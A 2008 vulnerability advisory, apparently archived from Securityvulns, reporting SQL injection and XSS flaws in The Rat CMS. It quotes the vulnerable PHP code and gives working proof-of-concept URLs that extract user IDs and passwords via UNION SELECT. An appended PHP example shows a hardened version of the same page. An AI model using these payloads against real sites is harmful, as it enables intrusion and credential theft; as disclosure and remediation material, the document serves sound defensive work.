The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

2008-06-26T00:00:00
ID SECURITYVULNS:DOC:20087
Type securityvulns
Reporter Securityvulns
Modified 2008-06-26T00:00:00

Description

==========================================================
The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities
==========================================================

.. CWH Underground Hacking Team ..

AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : cwh.citec.us

APPLICATION : The Rat CMS
VERSION     : Pre-Alpha 2
VENDOR      : N/A
DOWNLOAD    : http://downloads.sourceforge.net/the-rat-cms

--- Remote SQL Injection ---


Vulnerable File [viewarticle.php?id=]

@Line 5

73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
74: $result = mysql_query($query) or die('Error : ' . mysql_error());
75: $row = mysql_fetch_array($result, MYSQL_ASSOC);


Exploit

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]


POC Exploit

http://192.168.24.25/trcms/viewarticle.php?id=-9999//UNION//SELECT//user_id,user_password//FROM//tbl_auth_user--
http://192.168.24.25/trcms/viewarticle2.php?id=-9999//UNION//SELECT//user_id,user_password//FROM//tbl_auth_user--

--- Remote XSS ---


Exploit

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS>
[+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS>
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
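
A hardened counterpart to the viewarticle.php query quoted above, as an added example that is not part of the original advisory or of The Rat CMS code. Assumptions: PHP 8 with PDO, an in-memory SQLite database standing in for the CMS's MySQL database so the script runs offline, and hypothetical helper names h() and renderArticle().

```php
<?php
declare(strict_types=1);
// Added example: the news(title, content) columns come from the advisory;
// the SQLite backend, the sample row and the function names are assumptions.

function h(string $s): string
{
    // Encode for an HTML text or attribute context before printing.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderArticle(PDO $db, mixed $rawId): string
{
    // Accept only a positive integer; arrays, SQL fragments and markup fail here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '<p>Article not found.</p>';
    }
    try {
        // Bound parameter: the id travels as data and is never spliced into the SQL text.
        $stmt = $db->prepare('SELECT title, content FROM news WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Log server-side instead of die()-ing with the driver error in the response.
        error_log('viewarticle: ' . $e->getMessage());
        return '<p>Article not available.</p>';
    }
    if ($row === false) {
        return '<p>Article not found.</p>';
    }
    // Stored values are encoded on output as well, not only request input.
    return '<h1>' . h((string) $row['title']) . '</h1><div>' . h((string) $row['content']) . '</div>';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$db->exec("INSERT INTO news (title, content) VALUES ('Hello <b>world</b>', 'First post')");

// Constructed inputs; in the real page the value would be $_GET['id'] ?? null.
foreach (['1', '1 OR 1=1', '<XSS>', ['1']] as $input) {
    echo renderArticle($db, $input), PHP_EOL;
}
```

Only the first input renders an article, with the stored markup HTML-encoded; the other three return the generic not-found message without reaching the database.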